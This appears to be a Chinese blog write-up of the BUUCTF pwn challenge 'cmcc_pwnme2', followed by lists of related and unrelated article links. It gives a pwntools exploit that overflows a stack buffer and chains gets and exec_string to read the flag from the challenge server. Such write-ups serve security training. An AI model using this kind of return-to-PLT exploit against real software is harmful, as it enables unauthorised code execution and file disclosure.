cmcc_pwnme2
2024-05-18 22:26:47
![](/assets/blank.gif)
这个函数相当于打印出文件名为“string”中的文件内容
![](/assets/blank.gif)
这个函数相当于在result中加入路径
![](/assets/blank.gif)
这个函数同上
我也不太明白这两个函数的作用,这个题目主要是考传参,所以直接给出exp
from pwn import *
context(log_level='debug',arch='amd64',os='linux')
elf=ELF('/home/hacker/Desktop/pwnme2' )
p=remote("node4.buuoj.cn",26215)
#p=process('/home/hacker/Desktop/pwnme2' )p.sendline('a'*(0x6c + 4) + p32(elf.plt['gets']) + p32(0x80485cb) + p32(0x804a060))
p.sendline("flag")
p.interactive()
这就相当于在string中输入路径,然后直接调用exec_string()来获取flag。
cmcc_pwnme2相关推荐
- BUUCTF之“cmcc_pwnme2”做题简单记录
这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就 是提示的信息. from pwn import *p = remote('node4.buuoj.cn',25488) ...
- PWN-PRACTICE-BUUCTF-19
PWN-PRACTICE-BUUCTF-19 hitcontraining_bamboobox picoctf_2018_shellcode npuctf_2020_easyheap cmcc_pwn ...
- 持续更新 BUUCTF——PWN(二)
文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...
- BUUCTF pwn wp 76 - 80
cmcc_pwnme2 int __cdecl userfunction(char *src) {char dest[108]; // [esp+Ch] [ebp-6Ch] BYREFstrcpy(d ...
最新文章
- 有氧运动 无氧运动
- IDEA无法通过类加载器获取resources文件夹配置文件解决办法
- kohana3 数据库模块配置
- 代码运行错误及解决方法
- ubuntu 20.04 源码编译 cmake
- 小米温控配置不见了_小米11值得买吗?目前看来功耗很高啊?
- IS-IS详解(十六)——IS-IS 分片扩展
- Struts,Spring,Hibernate三大框架的面试
- python自动化框架搭建过程_一步一步教你编写与搭建自动化测试框架——python篇...
- Oracle 建表语句,表结构操作sql
- SPSS作业-如何判别是否服从正态分布
- 吐血推荐一大波让你直呼哇塞的Canvas库
- 年度光电领域盛会——CIOE中国光博会开幕在即!小枣君将全程在线直播!
- Win10下Flutter开发环境搭建这一篇足矣
- 【凝水成冰】记学生事务系统的结构化
- 极坐标梯度公式_一种基于极坐标系梯度变化的类圆环边缘检测方法与流程
- EventBus Vuex?
- Java多word文件生成后进行压缩并导出下载后,压缩文件损坏并提示“不可预料的压缩文件末端”和“CRC校验失败”
- ITK-图像主轴分析
- matlab里面nargin,Matlab中的nargin命令
热门文章
- chatgpt-AI工具
- SSL证书常用的加密算法有哪些
- 外贸人用远程工具进行跟单的详细操作
- 小程序 | 【黑马】本地生活 小程序
- 实时获取汇率_Currencylayer实时汇率
- GPU编程自学10 —— 流并行
- paypal/stripe轮询系统中ab跳转能否被识别?
- 【CocosCreator 3.x】使用 UIMeshRenderer 组件实现 3D 渲染在 UI 上 => 攻略
- 蒜头君:所谓角谷猜想,是指对于任意一个正整数,如果是奇数,则乘 33 加 11,如果是偶数,则除以 22,得到的结果再按照上述规则重复处理,最终总能够得到 11。如,假定初始整数为 5
- 让机器人的学习更有趣的Fable